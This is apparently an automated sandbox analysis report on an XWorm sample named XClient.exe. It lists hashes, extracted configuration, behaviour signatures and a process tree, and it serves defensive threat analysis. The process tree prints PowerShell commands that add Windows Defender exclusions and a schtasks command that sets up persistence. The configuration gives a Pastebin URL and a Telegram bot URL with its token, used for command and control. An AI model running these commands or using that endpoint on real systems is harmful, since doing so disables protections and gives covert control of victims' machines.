Analysis
-
max time kernel
147s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-01-2025 21:16
Behavioral task
behavioral1
Sample
XClient.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
XClient.exe
Resource
win10v2004-20241007-en
General
-
Target
XClient.exe
-
Size
81KB
-
MD5
75c36e72847b9bc3cc674eac06c44565
-
SHA1
a42206858b46997eb8f702539ddfa77c300c82a9
-
SHA256
a78098fb2b94571b85c7dce87af0cb9d8458b6d4e223ddb7fd633d81cae07462
-
SHA512
5d9ec6a2af00a1e10836e433d85e0b1facef17548f96c2513317a2386a136fd86d2d8e951199ebca9093a1a36c457d2a04435d5ffca9a60c19f06cb241e55ca4
-
SSDEEP
1536:33/nZzjyT2tJkzLIUnBjUthHE9bAMz/NFbs6WrNykOy5RjsmY:fnMStJk3IMUE9bd7/bSDOyL1Y
Malware Config
Extracted
xworm
-
Install_directory
%AppData%
-
install_file
USB.exe
-
pastebin_url
https://pastebin.com/raw/sZpRUbiu
-
telegram
https://api.telegram.org/bot7704029346:AAHPre1lXQa0UfPCpOUXJZ9UXA9mFxvH4Gk/sendMessage?chat_id=7590668020
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/memory/3292-1-0x0000000000F90000-0x0000000000FAA000-memory.dmp family_xworm behavioral2/files/0x000b000000023cae-59.dat family_xworm -
Xworm family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 632 powershell.exe 3704 powershell.exe 1176 powershell.exe 4348 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation XClient.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\security.lnk XClient.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\security.lnk XClient.exe -
Executes dropped EXE 2 IoCs
pid Process 2480 security 412 security -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\security = "C:\\Users\\Admin\\AppData\\Roaming\\security" XClient.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 46 IoCs
flow ioc 80 pastebin.com 78 pastebin.com 76 pastebin.com 46 pastebin.com 87 pastebin.com 62 pastebin.com 27 pastebin.com 37 pastebin.com 45 pastebin.com 50 pastebin.com 66 pastebin.com 82 pastebin.com 83 pastebin.com 21 pastebin.com 86 pastebin.com 49 pastebin.com 54 pastebin.com 60 pastebin.com 61 pastebin.com 71 pastebin.com 81 pastebin.com 26 pastebin.com 43 pastebin.com 48 pastebin.com 51 pastebin.com 57 pastebin.com 58 pastebin.com 73 pastebin.com 84 pastebin.com 24 pastebin.com 15 pastebin.com 28 pastebin.com 44 pastebin.com 59 pastebin.com 70 pastebin.com 72 pastebin.com 74 pastebin.com 14 pastebin.com 79 pastebin.com 77 pastebin.com 47 pastebin.com 56 pastebin.com 63 pastebin.com 75 pastebin.com 85 pastebin.com 17 pastebin.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2544 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 632 powershell.exe 632 powershell.exe 3704 powershell.exe 3704 powershell.exe 1176 powershell.exe 1176 powershell.exe 4348 powershell.exe 4348 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 3292 XClient.exe Token: SeDebugPrivilege 632 powershell.exe Token: SeDebugPrivilege 3704 powershell.exe Token: SeDebugPrivilege 1176 powershell.exe Token: SeDebugPrivilege 4348 powershell.exe Token: SeDebugPrivilege 2480 security Token: SeDebugPrivilege 412 security -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 3292 wrote to memory of 632 3292 XClient.exe 84 PID 3292 wrote to memory of 632 3292 XClient.exe 84 PID 3292 wrote to memory of 3704 3292 XClient.exe 86 PID 3292 wrote to memory of 3704 3292 XClient.exe 86 PID 3292 wrote to memory of 1176 3292 XClient.exe 88 PID 3292 wrote to memory of 1176 3292 XClient.exe 88 PID 3292 wrote to memory of 4348 3292 XClient.exe 92 PID 3292 wrote to memory of 4348 3292 XClient.exe 92 PID 3292 wrote to memory of 2544 3292 XClient.exe 98 PID 3292 wrote to memory of 2544 3292 XClient.exe 98 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"1⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3292 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\security'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'security'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4348
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "security" /tr "C:\Users\Admin\AppData\Roaming\security"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2544
-
-
C:\Users\Admin\AppData\Roaming\securityC:\Users\Admin\AppData\Roaming\security1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2480
-
C:\Users\Admin\AppData\Roaming\securityC:\Users\Admin\AppData\Roaming\security1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:412
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
Filesize
944B
MD537a924b11cf3f7f57fc56898abe9b0e6
SHA15ee379727611f74dc5fa677b65881d4c63e10f95
SHA2566e7f7c5fddb3a0300740fdcbe1a8ec3a0be0f16dff193f9806364a19262b52bf
SHA512903e1badb3577e0b3e92b69491596c9a402b51cdf3de43d5fb06b08c5689d2ff7ba25f8d1497d6527e943d9063a7ee79cbf2b47892de1de3b68cc7ca77853d6f
-
Filesize
944B
MD5da5c82b0e070047f7377042d08093ff4
SHA189d05987cd60828cca516c5c40c18935c35e8bd3
SHA25677a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5
SHA5127360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
81KB
MD575c36e72847b9bc3cc674eac06c44565
SHA1a42206858b46997eb8f702539ddfa77c300c82a9
SHA256a78098fb2b94571b85c7dce87af0cb9d8458b6d4e223ddb7fd633d81cae07462
SHA5125d9ec6a2af00a1e10836e433d85e0b1facef17548f96c2513317a2386a136fd86d2d8e951199ebca9093a1a36c457d2a04435d5ffca9a60c19f06cb241e55ca4